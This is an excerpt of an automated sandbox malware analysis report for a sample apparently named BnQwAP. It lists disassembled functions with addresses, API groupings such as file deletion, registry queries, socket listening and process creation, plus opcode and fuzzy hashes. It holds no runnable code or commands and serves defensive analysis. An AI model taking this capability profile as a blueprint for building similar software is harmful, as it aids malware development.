                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 2640511053-438819550
                                                                                                                    • Opcode ID: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                                                                    • Instruction ID: 66f8a66c0b8b23dc644c08a01f4346276c7d8e513f1a92e0406430822b1315fa
                                                                                                                    • Opcode Fuzzy Hash: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                                                                    • Instruction Fuzzy Hash: 6241E421A0CA4350EA40EB16EB446B96391FF40BE8F985131ED6EA36D4EF3ED44EC700
                                                                                                                    Function 00007FF65608055C Relevance: 16.9, APIs: 11, Instructions: 371registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3218304859-0
                                                                                                                    • Opcode ID: bfd33b311cee2062ccf4f7c99d60df25cce3d62e1d08c3ae9d56584007b3da53
                                                                                                                    • Instruction ID: 159b727f564ebaba1e9a4a531020fd83ff3d6fe004f941f6eb706b3464e7727a
                                                                                                                    • Opcode Fuzzy Hash: bfd33b311cee2062ccf4f7c99d60df25cce3d62e1d08c3ae9d56584007b3da53
                                                                                                                    • Instruction Fuzzy Hash: 74F1C036B05B4286EB10DF65D1942AD33B0FF88B98B088132DE4EA7BA5DF39E455C744
                                                                                                                    Function 00007FF6560683D4 Relevance: 16.8, APIs: 11, Instructions: 255comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2762341140-0
                                                                                                                    • Opcode ID: 28da4375d56d9c7790266f2ac16f9c30a3cff06f711ae95f6c1a6b970e5d2d74
                                                                                                                    • Instruction ID: 27dea0a9b66a22ef1f4d4be48c9967b2c36b7be8088125028c2278a3ff072405
                                                                                                                    • Opcode Fuzzy Hash: 28da4375d56d9c7790266f2ac16f9c30a3cff06f711ae95f6c1a6b970e5d2d74
                                                                                                                    • Instruction Fuzzy Hash: F9C16B76B04B8685EB50DF26D8841AD77A0FB88F98F094036DE4EA7765CF39D489C700
                                                                                                                    Function 00007FF65604C858 Relevance: 16.7, APIs: 11, Instructions: 166COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1255039815-0
                                                                                                                    • Opcode ID: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                                                                    • Instruction ID: 17bf0b1c1cad558b7815dc264a86a449818353496c490c0c41ca0ea7db8800ee
                                                                                                                    • Opcode Fuzzy Hash: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                                                                    • Instruction Fuzzy Hash: E861BF22B047518AEB20CFA2D9445AC37B5FF94B9DB084035DE8EA3B95DF7AD949C340
                                                                                                                    Function 00007FF65608A59C Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 312131281-0
                                                                                                                    • Opcode ID: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                                                                    • Instruction ID: 8b9951c0565889b98d101f085657e9743cff9adc9886aaf9bcab891c5ca253ce
                                                                                                                    • Opcode Fuzzy Hash: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                                                                    • Instruction Fuzzy Hash: 7371C236605A91C5E720CF65D9446EE3760FB88B98F584132DE4D97BA4CF3DD58AC700
                                                                                                                    Function 00007FF65605B7C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 171fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 4047182710-1173974218
                                                                                                                    • Opcode ID: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                                                                    • Instruction ID: d890c52efde343c88c9e61988da6da286b269392df8f64a8c3e771b7ce80c1a2
                                                                                                                    • Opcode Fuzzy Hash: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                                                                    • Instruction Fuzzy Hash: E581A922A0864395FB50EB61E5541FD6B60FF91798F480032FA4EA79A9DF3DE94DCB00
                                                                                                                    Function 00007FF65604D780 Relevance: 13.6, APIs: 9, Instructions: 54memorythreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1957940570-0
                                                                                                                    • Opcode ID: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                                                                    • Instruction ID: 8b0f1644aaa6bdae04bef193d445d0cb96f04d59be0bcf832cf65b150e411129
                                                                                                                    • Opcode Fuzzy Hash: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                                                                    • Instruction Fuzzy Hash: 0F213972919B8182E710CF53E54836AB7A1F789FDAF484129DA8D53B64CF7DD158CB00
                                                                                                                    Function 00007FF656022650 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155timeCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                                                                    • String ID: ?
                                                                                                                    • API String ID: 500310315-1684325040
                                                                                                                    • Opcode ID: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                                                                    • Instruction ID: 4bfdb4f78361f0c9eb6c2a59f7a355d53a77240493d6ab5e7d50e55792bc93fb
                                                                                                                    • Opcode Fuzzy Hash: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                                                                    • Instruction Fuzzy Hash: 8B619332A1864286F760DF21EE801A977A4FF84794F980135EA0EE3B94DF3DE449C750
                                                                                                                    Function 00007FF656073940 Relevance: 12.1, APIs: 8, Instructions: 116networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 540024437-0
                                                                                                                    • Opcode ID: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                                                                    • Instruction ID: 7615595d39e83beb59bd412fe7a7d552cba5c5292651960ff1f0cedca4a79b66
                                                                                                                    • Opcode Fuzzy Hash: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                                                                    • Instruction Fuzzy Hash: 2641CE62B0868282EB14DF26D5852796760FF84FA8F084630DA9E97792CF3DE449CB00
                                                                                                                    Function 00007FF656078360 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 331COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                    • API String ID: 0-572801152
                                                                                                                    • Opcode ID: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
                                                                                                                    • Instruction ID: dddc6c00fbcb517905f2a1f4fafa3e31c2d97dd1d1694c488af38e4e456fc523
                                                                                                                    • Opcode Fuzzy Hash: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
                                                                                                                    • Instruction Fuzzy Hash: F7E1C136A08B8286EB50CF65E5402AD77A4FB84B98F484136DF4DA7B94DF3DE549C700
                                                                                                                    Function 00007FF65605BC70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                    • Opcode ID: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                                                                    • Instruction ID: 81a74e5afe24e5499fdb7afc1547b37185af79ce2b17218ae996042ac4545cdb
                                                                                                                    • Opcode Fuzzy Hash: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                                                                    • Instruction Fuzzy Hash: B141EB26A28A8382EB90EB10E5541FD6360FF90B58F981031EA5E936D5DF7DD909CB10
                                                                                                                    Function 00007FF65601AF58 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1239891234-0
                                                                                                                    • Opcode ID: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                                                                    • Instruction ID: ea62da4a76b645cb5ec33bda8e4a9c6383eff1aaef9b6cf737feba32c8386b88
                                                                                                                    • Opcode Fuzzy Hash: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                                                                    • Instruction Fuzzy Hash: 21318236618F8186EB61CF25E9403AE73A5FB88758F580135EA9D93B98DF3DC549CB00
                                                                                                                    Function 00007FF65604D2C4 Relevance: 9.1, APIs: 6, Instructions: 77processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1413079979-0
                                                                                                                    • Opcode ID: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                                                                    • Instruction ID: 684a8ac02284cc17b96f384ebfdbc3549624812c638e3b86d2d77f5c27db2da2
                                                                                                                    • Opcode Fuzzy Hash: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                                                                    • Instruction Fuzzy Hash: 41316C32608B8586D7648F02F4807AAB7A5FB89B95F184136DECD93B54DF7ED449CB00
                                                                                                                    Function 00007FF656077E38 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 237COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                    • API String ID: 1653399731-2785691316
                                                                                                                    • Opcode ID: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                                                                    • Instruction ID: b9351d9835ad3472004894d0d4651ad9a148e4cd482d581fb37cc8b2480f5b3c
                                                                                                                    • Opcode Fuzzy Hash: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                                                                    • Instruction Fuzzy Hash: CCB1BD36B08B428AEB50DF61D5801AD7BB1FB84798F580136EE4DA3B58DF39E549CB40
                                                                                                                    Function 00007FF65606A874 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118filesleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1927845040-438819550
                                                                                                                    • Opcode ID: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                                                                    • Instruction ID: e051d8651bb916de6cbb301a45f84ddbad7da3935aa9b034d3103967d85a8c57
                                                                                                                    • Opcode Fuzzy Hash: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                                                                    • Instruction Fuzzy Hash: E951B532608B8295EB10DB25E9441AD73B0FB45798F680132DE5DA3799DF3ED98DC700
                                                                                                                    Function 00007FF655FEBE70 Relevance: 8.6, Strings: 6, Instructions: 1141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ERCP$PCRE$VUUU$VUUU$VUUU$VUUU
                                                                                                                    • API String ID: 0-2187161917
                                                                                                                    • Opcode ID: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                                                                                    • Instruction ID: b624d8518053e97844a66676bf266f032b60e8a5c3889cdfe7746b46d3879194
                                                                                                                    • Opcode Fuzzy Hash: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                                                                                    • Instruction Fuzzy Hash: E1B2A376A086928AEB648F65D9042BD37A1FF44B8CF184135EA4DE7B94DF39EC45CB00
                                                                                                                    Function 00007FF656074074 Relevance: 7.6, APIs: 5, Instructions: 148networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4170576061-0
